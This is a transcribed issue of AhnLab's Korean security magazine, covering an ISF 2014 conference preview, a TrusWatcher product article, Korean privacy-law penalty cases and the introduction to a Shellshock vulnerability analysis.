안랩온라인보안매거진 AhnLab TrusWatcher

Transcription

1 안랩온라인보안매거진 AhnLab TrusWatcher

2 월간 CONTENTS 3 Spotlight AhnLab ISF 2014 고도화된위협, 대응전략을재편하고가시성을확보하라! 8 Special Report 네트워크-엔드포인트간의시너지로강력한보안기능제공안랩트러스와처의특별한전략, 탐지에서대응까지 12 Hot Issue 2014년개인정보보호법위반에따른행정처분사례개인정보보호법위반하면, 어떤일이? 14 Threat Analysis Bash 취약점, 쉘쇼크 전세계를강타하다! 17 IT & Life Black Hat 2014 & Def Con 22 사이버세계를수호하는열정과존중 24 AhnLab News 안랩, 제 8회금융정보보호콘퍼런스 참가안랩 V3 모바일, 만점으로 10회연속 AV-TEST 글로벌인증획득 25 Statistics 2014년 8월보안통계및이슈 2

3 Spotlight AhnLab ISF 2014 Preview 안랩, 보안콘퍼런스 AhnLab ISF 2014 개최 고도화된위협, 대응전략을재편하고가시성을확보하라! 안랩보안콘퍼런스 AhnLab ISF(Integrated Security Fair) 2014가오는 10월 15일서울삼성동코엑스인터컨티넨탈호텔에서개최된다. 기업및기관보안담당자 2,000여명이참석하는이번행사에서안랩은 RE:SOLUTION, Be more advanced than threats 라는주제로, 고도화 다변화되는최신위협에대해실효성있는대응방안을제시한다. 최신공격동향에대한공유를통해빠르게변화하는위협의실체를정확히파악하는한편, 이에대한기존대응체계의효과와한계를냉정하게살펴봄으로써위협에대한가시성과실효성있는보안체계를확보해야한다는것이다. 권치중안랩대표이사는 안랩의악성코드분석기술과전방위적인대응조직, 다양한제품라인업을중심으로고객이기대하는안랩의가치를전달하는한편, 다양한글로벌보안기업과의유기적인협업을통해최신위협에효과적으로대응하는모습을보여드릴것 이라고전했다. 이와관련해 AhnLab ISF 2014는세션발표외에도행사장곳곳에서안랩및주요글로벌기업들이최신보안기술을눈앞에서직접시연하는등다채로운이벤트가제공될예정이다. 올해는연초부터개인정보유출사건이잇따라발생하는등보안이슈로산업전반이몸살을앓고있다. 특히타깃공격, APT(Advanced Persistent Threat) 등으로대표되는지능형위협이실체화됨에따라 보안 을기업의인프라측면이아닌비즈니스의핵심요소또는위기관리요소로인식해야한다는주장이힘을얻고있다. 문제는이러한최신위협에대응하기위한해결책을고민하기에앞서현보안체계의효과적인운용과부족한부분에대한판단조차쉽지않다는것. 이에안랩은 AhnLab ISF 2014를통해최신위협의실체와현보안체계의한계를명확하게파악할수있는방법을제시할예정이다. 키노트및 12개세션발표가진행되는이번행사에서안랩은트랙 A를통해보안솔루션과시스템을재정비 (Replan) 할수있는방법을제시하고트랙 B를통해고도화된위협에실질적인대응 (Redo) 이가능토록하는한편, 트랙 C를통해서는내 외부위협요소에대해면밀히살펴봄으로써 (Resee) 시큐리티인텔리전스 (Security Intelligence) 를확보하는방안을공유한다. 명실상부국내최고의통합정보보안콘퍼런스로자리잡은 AhnLab ISF 에매년국내외보안전문가들의시선이집중된다. 3

4 Keynote 정진교안랩제품기획실실장 Customer Experience Based Security - R. A. C. E 2013년전세계적으로생성된디지털데이터는 4조 4,000억기가바이트. 이데이터를 DVD 로저장할경우 38만 3,000km에달하는지구에서달까지거리의 5배에해당하는정도라고한다. 보안위협도데이터증가와사이버블랙마켓의성장으로인해폭발적인증가세를보이고있다. 표적층의다양화, 지속적인신종공격, 새로운취약점을활용한공격, 다양한디바이스를겨냥한하이브리드공격등보안위협의수법또한지능적으로변화하고있다. 이에우리가현재그리고앞으로직면하게될보안위협의실체가무엇인지를알아보자. 이와함께실효성있는능동적인방어체계를구현하기위해사용자의관점에서위협요소에접근하는방안과현시점에서무엇이필요한지살펴보자. Track A Re:Plan the Security 이건용안랩제품기획팀과장엔드포인트보안강화의해법, Back to the Basic! 기업은엔드포인트를노리는보안위협에대응하기위해백신을비롯해다양한보안솔루션을도입하고있다. 그러나실효성있는엔드포인트보안을위해서는기본이잘되어있는지확인해볼필요가있다. 엔드포인트의핵심인업무용 PC 자체의취약한부분에대한관리가그것이다. 취약한패스워드, 보안업데이트미적용등엔드포인트에는그자체에관련된취약한지점이다수존재한다. 이를통해유입되는위협을방지하기위해서는전통적인방식으로백신을통해악성코드에대응하는한편, 엔드포인트보안의기본이되는보안상태를점검해가시성을확보하고이를관리할수있는방법이필요하다. 박문형안랩소프트웨어보안팀차장개인정보보호솔루션, 잘사용하고계십니까? 2014년은기록적인수준의대규모개인정보유출사건이잇따라발생했다. 크고작은개인정보유출사고및관련컴플라이언스강화로인해개인정보보호솔루션의수요가증가하고있다. 그러나개인정보에대한충분한이해와준비되지않은상태에서솔루션을도입하고사후조치또한미흡해솔루션도입의의미가퇴색되고있다. 실제도입사례를통해개인정보보호솔루션의도입과정전반을살펴보고, 이를토대로시행착오는최소화하고효율적인운영및사후조치까지, 우리기업에적절한개인정보보호솔루션도입과운영방안이무엇인지알아본다. 임기철새마을금고전산정보보호팀팀장금융환경변화에따른능동적보안전략구축사례금융권은다른산업분야보다보안에민감할수밖에없다. 게다가나날이공격기법은다양화, 고도화되는가운데금융권을둘러싼컴플라이언스이슈도강화돼기존방어체계의진화가시급한시점이다. 특히, 기존의 보안사고를막을수있다 가아닌 모니터링할수있다 는관점의전환을통해실효성있는대응체계로재편해야한다. 이에최신금융권환경변화에대한능동적인보안전략구축사례를공유한다. 4

5 유명호안랩제품기획팀팀장네트워크경계보안, 그한계를넘다모바일디바이스이용증가, 트래픽의폭증, 클라우드로의전환, 빅데이터환경속에서보안위협은이전에는경험해보지못한수준으로고도화 다양화의양상으로빠르게변화하고있다. 이러한환경속에서지금까지네트워크보안의기본필수재로여겨졌던방화벽은더이상예전의 네트워크경계에위치한 dummy 이기를거부한다. 보안생태계의변화와더불어자생력을갖추기위해다양한변화의움직임을보이고있는것. 이에최신 IT 환경속에서차세대위협대응을위한네트워크보안을재정립하고차세대위협대응에서의네트워크보안솔루션의진일보한역할론에대해알아본다. Track B Re:Do the APT Defense 윤상인안랩제품기획팀차장왜 지능형위협대응 인가? 이른바 APT 공격 으로통칭되는타깃공격, 제로데이익스플로잇등최신지능형위협에대부분의보안담당자들이골머리를앓고있다. 글로벌업체들은앞다퉈가상머신이나샌드박스기반의악성코드분석기술을적용한지능형위협대응솔루션 ( 이른바 APT 대응솔루션 ) 을출시했다. 그러나이들대부분이네트워크레벨의탐지위주의한계를드러냄에따라최근에는엔드포인트레벨의대응이요구되는추세다. 이에실효성있는지능형위협대응솔루션의역할과효과를정의하기위해최신기술동향및국내외보안기업들의대응전략을알아본다. 이종현안랩글로벌TAC팀과장실제사례로본 지능형위협대응, 도입부터운영까지이름부터어려운 지능형지속위협 (Advanced Persistent Threat, APT) 은복잡다단한공격기법못지않게대응솔루션의운용또한여간복잡한것이아니다. 이른바 APT 대응솔루션 의도입을고려하는기관 / 기업의보안담당자들이반드시알아야만하는것은무엇일까? 베스트프랙티스 (Best Practice) 를통해실제 APT 대응솔루션의도입부터구축, 운영방식을알아봄으로써조직의내부환경및비즈니스에최적화된 APT 대응솔루션의선택기준을제시한다. 또한시연을통해최신공격트렌드를중심으로 APT 대응솔루션의능동적인공격차단및방어과정을공유한다. 임차성안랩네트워크개발실선임익스플로잇 (Exploit) 기반의 APT 공격사례로본행위기반기술의한계최근몇년간지능형지속위협 APT가전세계적으로화두가되고있다. 고도화된악성코드를이용한 APT에대한대응방안으로행위기반분석기술및솔루션이관심을받고있다. 문제는행위기반분석기술만으로는애플리케이션의취약점을이용한익스플로잇 (exploit) 기반의공격에대응할수없다는것. 이에애플리케이션취약점을이용한익스플로잇시연및실제사례를통해행위기반분석기술의한계와대안을살펴본다. 5

6 김창희안랩제품기획팀차장 APT 공격최후의방어선 엔드포인트 보안의진화지능형지속위협 APT의공격기법은그끝을예측할수없을만큼진화하고있다. APT 공격의첨병인고도화된악성코드는 VM 기반의최신 APT 대응솔루션이장착된네트워크방어선마저뚫고기업내부로유입되어엔드포인트에도달한다. 그러나엔드포인트단에서는여전히백신외에는뚜렷한추가방어기재가없는상태다. 결국 APT에대한최후의방어선일수밖에없는엔드포인트의보안강화를통한방어체계의재정비가요구된다. 이에 Informationdriven 관점의차세대엔드포인트보안기술을알아본다. Track C Re:See the Intelligence 최광호안랩 SI사업팀팀장차세대보안아키텍처를위한협업 (Collaboration) 전략최근보안사고가끊이지않고발생하는원인은방대한 IT 환경속에서지나치게많은데이터와로그의홍수로 유의미한데이터 파악이어렵기때문이다. 또한나날이진화하는공격에비해여전히알려진공격탐지위주의전통적인방식으로대응하고있는상황이다. 이에최근의보안패러다임의변화를살펴보고기존공급자중심의오퍼링모델과는차별화된, 수요자중심으로새롭게재편된 안랩시큐리티프레임워크 2014 를소개한다. 이를통해개별솔루션기반의단순한보안체계가아닌, 실효성있는보안체계를구축하고가시성을확보해궁극적으로보안위협을최소화할수있을것이다. 이상구안랩서비스상품기획팀부장가시성기반의차세대보안관리모델구축전략갈수록지능화되는보안위협과반복되는보안사고에대응하기위하여최근금융권및대기업을중심으로빅데이터 (Big data) 기반의통합보안관제플랫폼에대한관심이높아지고있다. 안랩이제시해온선진적인차세대통합보안관제체계는지난 2012년모금융사에최초로구축되어그효과가검증된바있으며, 현재다수의고객사에서차세대통합관제및내부통제플랫폼으로활용되고있다. 검증된안랩의차세대통합관제체계와더불어빅데이터분석, Threat Intelligence 연계를통해고도화된최신보안위협에효과적으로탐지및대응하고있는실제사례를소개한다. 조남용 EMC RSA 부장최신위협대응을위한차세대보안관제전략, Beyond SIEM 지금까지 SIEM(Security Information and Event Management) 은보안관제의핵심솔루션으로인식되어왔다. 그러나나날이고도화되고있는위협에대응하기위해서는이제새로운전략이요구된다. 이에 SIEM의한계를살펴보고, 이를극복하기위한전략으로패킷 (Packet), 로그 (Log), 엔드포인트 (Endpoint), 넷플로우 (NetFlow) 를연계한차세대통합위협탐지 / 분석모델을제시한다. 정택진아카마이테크놀로지이사클라우드기반의보안서비스전략및고객사례다양한디바이스의증가와동영상등사용자의콘텐츠소비패턴변화로인터넷트래픽또한폭증하고있다. 이와함께다양한공격툴이등장해사용자들은그어느때보다위협에노출되어있다. 대규모트래픽을이용한공격뿐만아니라지능화된공격이늘어남에따라공격이발생하는근원지에서이상징후를감지하고차단할수있는보안전략이요구된다. 실제국내고객사례를통해클라우드기반의보안전략및서비스를공유한다. 6

7 AhnLab ISF 2014 RE:SOLUTION, Be more advanced than threats 일시 : 2014 년 10 월 15 일 (Wed.) 13:00~18:00 장소 : 서울삼성동코엑스인터컨티넨탈호텔하모니볼룸홈페이지 : 13:00~13:30 행사등록및전시부스관람 13:30~13:50 Welcome Speech / 권치중안랩대표 13:50~14:20 <Keynote Speech> Customer Experience Based Security - R. A. C. E / 정진교안랩제품기획실실장 14:20~14:50 전시부스및시연관람 Track A Track B Track C Re:Plan the Security Re:Do the APT Defense Re:See the Intelligence 14:50~15:20 엔드포인트보안강화의해법, Back to the Basic! 왜 지능형위협대응 인가? 차세대보안아키텍처를위한협업 (Collaboration) 전략 15:20~15:50 개인정보보호솔루션, 잘사용하고계십니까? 실제사례로본 지능형위협대응, 도입부터운영까지 가시성기반의차세대보안관리모델구축전략 15:50~16:20 전시부스관람및이벤트 16:20~16:50 금융환경변화에따른능동적보안전략구축사례 익스플로잇 (Exploit) 기반의 APT 공격사례로본행위기반기술의한계 최신위협대응을위한차세대보안관제전략, Beyond SIEM 16:50~17:20 네트워크경계보안, 그한계를넘다 APT 공격최후의방어선 엔드포인트 보안의진화 클라우드기반의보안서비스전략및고객사례 17:20~17:40 Lucky Draw * 상기내용은별도의사전공지없이변경될수있습니다. 7

8 Special Report AhnLab TrusWatcher 안랩트러스와처, 네트워크 - 엔드포인트간의시너지를통해강력한보안기능제공 안랩트러스와처의특별한전략, 탐지에서대응까지 언제부터인가대부분의보안담당자들은지능형위협, 타깃공격, 제로데이익스플로잇등소위 APT 공격 으로통칭하는진화된형태의보안위협을어떻게대응할지에대해서골머리를앓고있다. 현재대형글로벌업체들은이러한 APT 대응을위한솔루션을출시하고있으며, 이들제품가운데대다수가가상머신이나샌드박스기반의악성코드분석기술을적용하고있다. 그러나이들제품은네트워크레벨만의탐지에대한한계를보여주고있으며, 각벤더들은이를극복하기위해엔드포인트레벨의대응으로확장추세에있다. 안랩은초기부터단순히네트워크레벨의샌드박스동적분석기술만으로는최신보안위협에대응하는것에한계가있음을인지하고전용에이전트를같이제공함으로써 네트워크와엔드포인트 간의시너지강화에기술력을투자해왔다. 이글을통해안랩트러스와처가네트워크와엔드포인트간의시너지를통해어떠한효과를가져올수있는지확인해보자. 최근의보안위협중심에악성코드 (malware) 가있다는데에는누구도부정하지못할것이다. 이러한악성코드를탐지및차단하는영역에속하는보안제품으로는엔드포인트레벨의안티바이러스외에도네트워크영역에서악성코드를탐지하는시큐어웹게이트웨이 (secure web gateway) 및시큐어이메일게이트웨이 (secure gateway) 가있다. 하지만이들전통적인안티멀웨어 (Anti-malware) 제품의가장큰약점은시그니처기반기술을사용하여지능형위협에흔히사용되는알려지지않은악성코드 (unknown malware) 탐지에는한계가있다는것이다. 이런한계를극복하기위해네트워크레벨의샌드박스 (sandbox) 내에서악성코드를동적으로분석하는소위 MPS(malware protection system) 라는보안솔루션시장이형성되고있다. 이러한 MPS 솔루션이내부네트워크로유입되는최신알려지지않은악성코드에대한가시성을제공한다는측면에서악성코드에대한보안통제에큰도움이되는것이맞다. 하지만점차지능화되는악성코드중심의보안위협을방어하기위한특효약 (silver bullet) 은될수없다는점또한명심해야한다. 우선네트워크로유입되는최초의알려지지않은악성코드 (unknown malware) 에대해서는희생양 (sacrificial lamb) 또는최초감염 (patient zero) 이발생할수밖에없다는점이다. 악성코드제작자는 MPS와같은샌드박스환경에서의동적분석을방해하기위한목적으로다양한안티-VM(anti-VM) 및안티-샌드박스 (anti-sandbox) 기능을사용한다. 악성코드제작자는특정타깃공격을위해특정환경및조건에서만트리거 (trigger) 되는악성코드를제작함으로써범용적인 OS/ 애플리케이션환경의샌드박스에서는실행되지않는경우도존재한다. 최신의지능형악성코드는 MPS와같은네트워크레벨의샌드박스기반동적분석을염두에두고작동한다. 이지능형악성코드는악성코드를여러컴포넌트로분리한뒤시간차를두고다양한네트워크세션으로유입시킨후에엔드포인트레벨에서재조합하여궁극적으로악성행위를유발하기도한다. 이러한샌드박스기반동적분석기술을활용하는 MPS 제품군의한계는모니터링위치가네트워크라는것에기인한다. 즉, 악성코드입장에서네트워크는다양한유입경로 (vector) 중의하나일뿐이며, 네트워크로유입되는과정에서실시간으로샌드박스기반동적분석을한다는것은불가능하다. 이러한 MPS 제품군이아무리탐지를잘한다하더라도이미네트워크를통해내부시스템으로유입된악성코드에대해서는아무런대응을할수없는한계가있다. 이러한네트워크기반 MPS 제품의한계를극복하면서최신지능형위협에효과적으로대응하기위해서는네트워크와엔드포인트각영역에서 8

9 연계대응하는것이기본적으로요구된다. 전용에이전트를제공하고있는 MPS 제품인안랩트러스와처가어떻게네트워크-엔드포인트레벨의시너지를이루는지소개한다. 탐지된신종악성코드제거기능 많은보안전문가들이지적해왔듯이보안위협을완벽하게방어한다는것은사실상불가능하다. 따라서최근보안위협방어체제는차단 (protection) 에실패할것에대비하여탐지 (detection) 가점차강조되는추세이다. 특히, 대부분의네트워크기반 MPS 제품들은각벤더마다주장하는악성코드를탐지하는고급기술을내세워서차별화를강조하고있다. 하지만, 고가의네트워크기반 MPS 제품을구매한실무보안담당자입장에서는과연탐지를잘하는것에만족할수있을까? 보안담당자의역할과책임은단순히보안위협에대한탐지에국한되지않으며, 탐지된보안위협으로인한피해를최소화하는동시에해당위협을신속하게제거하는것이다. 네트워크 MPS 제품에서임직원을타깃공격하는신종악성코드를탐지했다고가정해보자. 우선보안담당자는해당악성코드를다운로드한 PC 혹은해당 PC를사용하는담당자를신속하게확인해야한다. 사내망의 IP 주소정보와실제사용하는임직원정보가잘관리되어있다면누가어떤 PC를사용하고있는지파악할수있다. 그렇다면그이후에는어떤대응을할수있을까? 해당 PC를네트워크에서분리해서추가적인위협의확산을방지해야하며, 격리된 PC에대해피해분석및복구를수행해야한다. 이런엔드포인트레벨의대응과정에서 MPS가제공하는악성코드의해시 (hash) 정보만으로실질적인감염여부를파악하고, 수동으로악성코드를찾아서삭제하거나 PC를포맷하는업무는보안담당자에게많은시간과집중을요하는작업이다. 만약하루에 1~2건의이벤트가발생한다면즐거운마음으로해당대응업무를할수있을지도모른다. 하지만네트워크 MPS를실제운영해본보안담당자라면잘알겠지만적게는수십건에서많게는수백건의악성코드관련이벤트가탐지된다. 이탐지된모든이벤트를수동으로대응하는것은불가능하다. 안랩트러스와처는전용에이전트를제공하여알려진악성코드의유입이탐지되면다운로드한 PC 혹은에이전트가설치된전체 PC에서즉시삭제하는명령이자동으로적용된다. 또한알려지지않은신종악성코드라면보안담당자의확인과정이후온-디맨드 (on-demand) 명령에의해삭제가가능하다. 만에하나오탐지로인해서정상파일에대해잘못삭제된경우에대비해서, 삭제된파일은안전하게복구할수있는기능도제공한다. [ 그림 1] 안랩트러스와처의전용에이전트를통한악성코드자동 수동삭제기능 실행보류를통한신종악성코드원천차단 앞서가는 MPS 벤더라면데스크톱안티바이러스와같은 EPP(Endpoint Protection Platform) 제품과의연동을통해 MPS를통한탐지 EPP를통한대응 과같은연계대응을고려할수도있다. 하지만, 이런연계과정에서중요한것은시간이다. 즉, 아무리 MPS가신종악성코드를잘탐지해서해당악성코드에대한삭제대응명령을연동된 EPP 제품에전달하더라도, 해당악성코드를샌드박스기반동적분석기술로탐지하기위해서는평균 3~5분의시간이소요된다. PC와같은엔드포인트시스템으로다운로드된악성코드가이러한 3~5분동안운좋게실행되지않았다면 삭제대응명령 에의해서삭제만되어도해당보안위협이제거되었다고볼수도있다. 하지만만약이미실행되어새로운악성파일이생성 (dropped) 되었거나, 인터넷접속후 C&C 서버로부터새로운악성파일을다운로드했거나, 극단적으로목적하는악성행위를수행한후에증거를남기지않기위해서 PC 전체하드디스크를포맷하는명령을수행했다고가정해보자. 고가의 MPS 제품과 EPP 제품간의연계대응이잘동작하더라도이미해커가원하는작업은완료된상태일것이다. 안랩트러스와처는엔드포인트시스템으로유입된악성도가확인되지않은파일인경우에는트러스와처의동적악성코드분석이완료되기전까지실행을차단하는실행보류 (execution holding) 기능을제공한다. 또한엔드포인트단계에서실행이시도되는실행형파일에대해서트러스와처의분석여부를우선확인한다. 이때분석중일경우에는분석완료시점까지실행을차단하게되며, 만약트러스와처가분석하지않는경우에는사용자의선택에의해해당파일은트러스와처로업로드해서동적분석을요청할수있다. 9

10 [ 그림 2] 안랩트러스와처의실행보류 (Execution Holding) 기능 암호화채널유입및컴포넌트화된악성코드대응 네트워크기반 MPS 제품을구매하는고객입장에서고려해야하는최신보안위협의특성으로는다음의두가지를들수있다. SSL과같은암호화트래픽또는파일암호화를통한악성코드유입 다양한컴포넌트로구성된재조합형악성코드증가전자는스노든효과 (Snowden effect) 의하나로정부차원의도감청 (eavesdropping) 이기정사실로되면서네트워크트래픽은물론인터넷을통해전달되는파일자체에대한암호화를사용하는비중이높아지고있다. 안전한인터넷사용을위해서는필수적인조치이지만, 보안담당자입장에서는이러한암호화채널을통한신종보안위협의유입을분석 탐지하는것이더욱어려운숙제가되고있다. SSL과같은암호화통신을모니터링하기위해서는전용 SSL 복호화 (decryption) 장비를구축하면되지만조직에서사용하는전체트래픽을감당하기위해서는고가의장비를구매해야한다. 또한웹브라우저방식의인증서키교환방식을사용하지않는 SSL 트래픽또는해커가직접개발한암호화알고리즘을사용하는암호화트래픽에대해서는분석자체가불가능한한계가존재한다. 최근의악성코드제작자들은 MPS와같은비교적최신보안장비가점차확산되는것을고려한다. 따라서단순히신종악성코드를사용하는것을넘어개별파일을분석하여어떠한의심스러운행위도발생하지않는다양한컴포넌트로구성된악성코드를타깃형공격에이용하고있다. 이러한진화하는보안위협에대응하기위해서더욱중요해지는것이엔드포인트레벨의대응이다. [ 그림 3] 암호화트래픽으로유입되는신종악성코드차단및분석 안랩트러스와처는전용에이전트를통한실행보류기능으로암호화채널을통한악성코드유입및컴포넌트화된악성코드에대응한다. 즉, 암호화트래픽으로유입된신종악성코드, 자체암호화및사용자의개입을통해엔드포인트시스템에서복호화된신종악성코드에대해실행보류기능으로우선실행을차단한다. 이와동시에동적분석을담당하는트러스와처장비에질의하여분석여부를확인한다. 이때분석중이아니라는응답이오면, 트러스와처에이전트는해당파일을트러스와처장비로업로드후동적분석을수행하여악성여부를판단하게된다. 컴포넌 10

11 트화된악성코드사례에대해살펴보면, 예를들어 A+B+C로구성되는악성코드가각각 1시간의시차를두고네트워크로유입되고 A, B, C 각각의파일은아무런의심행위를유발하지않는다고가정하자. 이런 A, B, C 파일이엔드포인트시스템에서재조합되어최종적으로 D라는악성행위를유발하는실행파일의생성 실행을시도하는경우트러스와처에이전트는동일하게실행보류기능을통해우선차단하고트러스와처로의업로드를통해악성여부를분석한다. 의심파일추출을통한감염호스트분석 보안담당자는신종악성코드가유입되는상황에서긴급한대응조치를수행한이후에는좀더깊이있는침해사고대응절차를수행하고자원할것이다. 현재보안시장에는엔드포인트포렌식이라는침해사고흔적을상세하게분석해주는전용보안제품이있지만, 고가의가격은배제하더라도분석결과의복잡성과높은난이도로실제해당제품을제대로운영하려면관련전문인력까지추가로채용해야하는어려움이있다. 또한일부 MPS 벤더는엔드포인트포렌식벤더를인수합병해서기존네트워크기반 MPS와연동가능한엔드포인트포렌식제품라인업을추가했으나, 아직별개의두제품을운영하는것과별반차이가없는수준의연동만제공하고있다. 안랩트러스와처는자체엔드포인트포렌식기술을트러스와처에이전트에구현하여다양한휘발성 (volatile) 및비휘발성 (non-volatile) 데이터를분석하고최종적으로 의심파일을추출 한뒤트러스와처장비에업로드하여동적분석을수행하는기술을제공한다. 보안담당자입장에서는엔드포인트포렌식 (endpoint forensic) 에대한전문지식없이도간편한명령하나만으로신종악성코드를다운로드했거나혹은 C&C 트래픽유발과같은악성코드감염이의심되는엔드포인트에대한추가적인의심파일의추출 분석이가능하다. [ 그림 4] 안랩트러스와처에이전트에구현된엔드포인트포렌식기술 결론 안랩은일찍이네트워크와엔드포인트를아우르는다계층보안 (multi-layered total security) 을강조해왔다. 즉, 수직적보안 (vertical security) 이라고명명하는네트워크를통해서유입되고나가는위협에대한모니터링및대응외에수평적보안 (horizontal security) 이라고명명한내부엔드포인트시스템간의위협전파및데이터유출에도적극적인모니터링과대응이필요하다는점이다. 현명한보안담당자는점차진화하는악성코드에대응하기위해서도동일하게네트워크레벨부터엔드포인트레벨까지각영역에서선택할수있는최선의탐지및대응기술이무엇인지파악하고있어야한다. 안랩은 MPS 시장형성초기부터단순히네트워크레벨의샌드박스동적분석기술만으로는최신보안위협에대응하는것에한계가있음을인지하고전용에이전트를같이제공함으로써 네트워크와엔드포인트 간의시너지강화에기술력을투자해왔다. 현재경쟁 MPS 벤더들이뒤늦게전용에이전트를출시하거나엔드포인트전문업체를인수 합병하는상황에서보안담당자들에게안랩트러스와처는악성코드방어전략수립과정에서반드시고려해야할필수제품임이틀림없다. 11

12 Hot Issue Privacy 2014 년개인정보보호법위반에따른행정처분사례 개인정보보호법위반하면, 어떤일이? 지난 8월 7일자로개정개인정보보호법이전면시행되면서개인정보관리에대한책임이한층더강화되었다. 안전행정부는사회전반의개인정보의보호수준향상과실태개선을위하여정부부처합동으로구성한 개인정보보호합동점검단 을중심으로, 개인정보의유출이나침해우려가있는취약분야및다량의개인정보를취급하는분야등을대상으로실태검사를실시했다. 이에안전행정부는지난 9월 24일, 2014년도민간기관에대한실태검사결과에따른 개인정보보호법위반에따른행정처분사례 를발표했다. 이를통해각기업이자체시정기회및인식전환계기로삼아정보보호수준제고를위해노력해줄것을권고했다. 이글에서는안전행정부가발표한 2014년민간분야개인정보보호법위반행위행정처분사례를소개한다. 수집이용, 제공시동의및고지의무위반 ( 제 15 조, 제 17 조, 제 18 조 ) 제15조제1항위반 : 5천만원이하의과태료 (1회위반 1천만원 ) 개인정보보호법제 15조 1항에따르면, 개인정보수집시정보주체의동의를획득해야만한다. 안전행정부는이에대한위반사례로모교육기부홈페이지에서정보수집시동의를미획득한경우를소개했다. 이경우, 1회위반시 1천만원의과태료가부과되었다. 제15조 ( 개인정보의수집이용 ) 제2항위반 : 3천만원이하의과태료 (1회위반 600만원 ) 또한개인정보보호법제 15조 2항에따르면, 개인정보수집시필수고지사항을고지하지않는경우에도처벌의대상이된다. 이때반드시고지해야하는항목 4가지는수집 이용목적, 수집항목, 보유 이용기간, 미동의시불이익고지등이다. 안전행정부가이자료를통해소개한사례를보면, 홈페이지를통한개인정보수집시동의거부권및불이익사항고지누락, 민원게시판에서개인정보수집시필수사항을전부고지누락한경우이다. 또한수집단계에서필수 / 선택항목을구분하나, 고지단계에서필수 / 선택항목을구분하지않은경우에도고지내용미흡으로처벌의대상이된다. 이경우 3천만원이하의과태료로 1회위반에 600만원의과태료가부과된다. 개인정보과도수집및서비스거부금지 ( 제 16 조 ) 제16조 ( 개인정보의수집제한 ) 제2항위반 : 3천만원이하의과태료 (1회위반 600만원 ) 개인정보보호법제 16조 2항에따르면, 최소한의정보외의수집에미동의시재화또는서비스제공거부를금지하도록되어있다. 이사례로홈페이지에서선택정보인주소수집에미동의시회원가입절차가정지되어서비스를이용한업체를적발했다. 이경우 1회위반시 600만원의과태료가부과된다. 개인정보의파기의무위반 ( 제 21 조 ) 제21조제1항위반 : 3천만원이하의과태료 (1회위반 600만원 ) 개인정보보호법제 21조 1항에따르면, 보유기간경과, 처리목적달성후개인정보를파기하도록하고있다. 이에대한위반사례로는홈페이지에서탈퇴한회원정보를기간내파기하지않거나일부미파기사례가소개되었다. 이경우 1회위반시 600만원의과태료가부과된다. 12

13 개인정보수집동의를받는방법위반 ( 제 22 조 ) 제22조제1~3항위반 : 각각 1천만원이하의과태료 (1회위반 200만원 ) 개인정보보호법제 22조의개인정보수집동의를받는방법을위반한경우도적발되었다. 안전행정부에따르면홈페이지에서주민번호와여권정보를일반정보와구분하지않고일괄동의받지않는경우, 일반정보와마케팅활용정보를구분하지않고일괄하여동의받은경우가이에속한다. 이경우 1회위반시 200만원의과태료가부과된다. 제22조제4항위반 : 3천만원이하과태료 (1회위반 600만원 ) 또한홈페이지에서선택정보인여권번호수집에미동의시회원가입절차가정지되어서비스이용을제한한업체도적발했다. 이경우에는선택적사항미동의시서비스거부금지위반으로 1회 600만원의과태료가부과된다. 개인정보처리위탁시준수사항위반 ( 제 26 조 ) 제26조 ( 업무위탁에따른개인정보의처리제한 ) 제1항위반 : 3천만원이하의과태료 (1회위반 200만원 ) 개인정보보호법제 26조에서는개인정보처리위탁시필수사항을문서에반영하도록정하고있다. 이때필수사항은위탁목적 범위, 목적외처리금지, 기술적 관리적보호조치, 재위탁제한, 안정성확보조치, 관리현황점검 감독, 손해배상등 7개항목이다. 이번조사에서적발된업체는위탁시필수사항을문서에일부또는전부누락한경우이며, 1회위반시과태료는 200만원이다. 이와함께수탁자에대한교육및실태점검등관리 감독을실시하지않는경우도적발되었으며, 이경우에는시정조치명령을받게된다. 이외에개인정보취급자에대한감독위반 ( 제 28조 ) 의경우개인정보취급자에대한교육을미실시한사례가있으며, 이는시정조치명령대상이다. 개인정보의안정성확보조치의무위반 ( 제 29 조 ) 제29조 ( 안전조치의무 ) 위반 : 3천만원이하의과태료 (1회위반 600만원 ) 안전행정부는개인정보보호법제 29조에해당하는개인정보안정성확보조치의무위반사례도소개했다. 개인정보의안정성확보조치는내부관리계획수립, 접근통제및접근권한제한, 저장, 전송시암호화, 접속기록보관, 보안프로그램설치, 물리적보호조치등 6개사항이다. 우선접근통제및접근권한의제한조치위반사례는외부에서관리자페이지에접속시 VPN이나전용선등안전한접속수단을사용하지않고아이디 / 비밀번호를인증하는경우, 관리자계정을 2명이상공유, 안전하지않은비밀번호작성규칙수립, 퇴사자접근권한미삭제, 취급자의권한변경이력기록미관리등이있다. 또한개인정보저장및전송시암호화위반사례로는홈페이지에서비밀번호저장시일방향이아닌양방향암호화실시, 비밀번호및주민번호저장시암호화미조치, 업무용 PC에주민번호포함저장시암호화미조치, 홈페이지에서회원의비밀번호 / 주민번호전송시암호화미조치등이적발됐다. 이외에도접속기록보관및위 변조방지조치위반사례로는관리자페이지의접속기록미생성및미보관, 접속기록을 6개월이상이아닌 3개월만보관하는경우도이에해당한다. 이와같이개인정보의안정성확보조치의무를위반했을때에는 1회 600만원의과태료가부과된다. 13

14 Threat Analysis Bash Vulnerability 유닉스, 리눅스 OS 관련 Bash 취약점상세분석 Bash 취약점, 쉘쇼크 전세계를강타하다! 2014년 9월 24일, GNU Bash 환경변수를통한코드인젝션취약점이보고되었다. 이른바 쉘쇼크 (ShellShock) 로불리는해당취약점에대해국내외보안전문가들은지난 4월전세계적으로이슈가된 하트블리드 (Heartbleed) 보다심각한위협이될것이라고한목소리를내고있다. Bash는기업들이주로사용하고있는서버 OS인유닉스및리눅스와관련해명령어해석기의역할을하고있는만큼최악의경우전세계웹서버의절반을마비시킬수도있다는것. 공격자는악의적인명령이포함된, 특별하게조작된환경변수를사용하여해당취약점을이용해악의적인행위를수행할수있다. 이에해당취약점의영향을받는 GNU Bash 환경을사용하고있는시스템관리자는보안패치를신속하게적용하여피해를예방할것이권고된다. 9월 29일현재레드햇, 우분투, 센트 OS, 노벨 / 수세등주요리눅스이용업체들은해당버그에대한패치를발표했다. 이와관련해월간안에서는최신취약점인 Bash 코드인젝션취약점과영향받는버전에대해자세히살펴보고기업의피해예방을위한방안을알아본다. GNU Bash에서임의의환경변수에코드인젝션 (Code Injection) 기법을이용해특정코드를삽입하여실행할수있는취약점이발견되었다. Bash(Bourne-again shell) 는유닉스, 리눅스및맥 OS X 계열의운영체제에이르기까지광범위하게사용되고있는커맨드쉘 (shell) 의일종으로, GNU 프로젝트를위해만들어졌다. 